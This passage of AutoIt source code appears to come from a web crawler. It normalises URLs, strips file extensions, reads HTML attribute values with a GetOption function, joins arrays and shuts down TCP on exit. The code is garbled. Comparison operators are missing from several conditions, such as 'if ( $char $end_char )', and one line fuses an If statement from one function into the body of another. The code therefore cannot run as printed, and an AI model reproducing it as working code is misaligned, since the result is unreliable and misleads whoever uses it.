$sNewURL = Stringreplace ( $sNewURL , ":/" , "://" )
if Stringleft ( $sNewURL , 1 ) = "/" Then
$sNewURL = Stringright ( $sNewURL , Stringlen ( $sNewURL )- 1 )
EndIf
If ( StringInStr ( $sNewURL , "#" )> 0 And LastIndexOf ( $sNewURL , "&" , false ) 0 then $ext = stringleft ( $ext , indexof ( $ext , "?" , false ))
Return( $Ext )
EndFunc
Func GetOption ( $opt , $HTMLline ); returns the value of the specified HTML parameter
Dim $Link = ""
$opt = $opt & "="
Dim $ndx = IndexOf ( $HTMLline , $opt , false )
if ( $ndx = - 1 ) then Return( "" )
$ndx = $ndx + Stringlen ( $opt ) + 2
Dim $end_char = stringmid ( $HTMLLine , $ndx - 1 , 1 )
if $end_char "'" and $end_char """" Then
$end_char = " "
EndIf
For $i = $ndx to Stringlen ( $HTMLline )
$char = ""
$char = Stringmid ( $HTMLline , $i , 1 )
if ( $char $end_char ) then
$Link = $Link & $char
else
ExitLoop
endif
Next
Return( $Link )
EndFunc
Func join ( $array , $join_char ); split function^(- 1 )
If UBound ( $array ) = 0 Then Return( "" )
Dim $res
For $e = 1 To $array [ 0 ]
$res = $res & $array [ $e ] & $join_char
Next
Return( StringLeft ( $res , StringLen ( $res )- 1 ))
EndFunc
func onautoitexit (); on exit,
TCPShutdown ()
EndFunc